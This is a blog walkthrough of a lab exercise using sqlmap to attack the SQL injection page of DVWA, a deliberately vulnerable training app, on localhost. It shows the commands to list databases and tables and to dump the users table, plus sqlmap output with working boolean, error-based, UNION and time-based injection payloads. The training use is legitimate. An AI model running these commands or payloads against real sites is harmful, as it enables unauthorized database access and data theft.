then press menu sql injection, then in form input id input with 1, so dvwa will show as below :
then open sql map and type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" --string="Surname" --dbs
below is a part of result from that command :
then type command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:52:34
[11:52:34] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:52:34] [INFO] resuming injection data from session file
[11:52:34] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:52:34] [INFO] manual usage of GET payloads requires url encoding
[11:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:52:34] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[11:52:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:52:35
then type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -T users -C user_id --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:56:20
[11:56:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:56:20] [INFO] resuming injection data from session file
[11:56:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:56:20] [INFO] manual usage of GET payloads requires url encoding
[11:56:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:56:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[11:56:20] [INFO] fetching current database
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[11:56:23] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[11:56:23] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1 |
| 3 |
| 2 |
| 5 |
| 4 |
+---------+
[11:56:23] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[11:56:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:56:23
No comments:
Post a Comment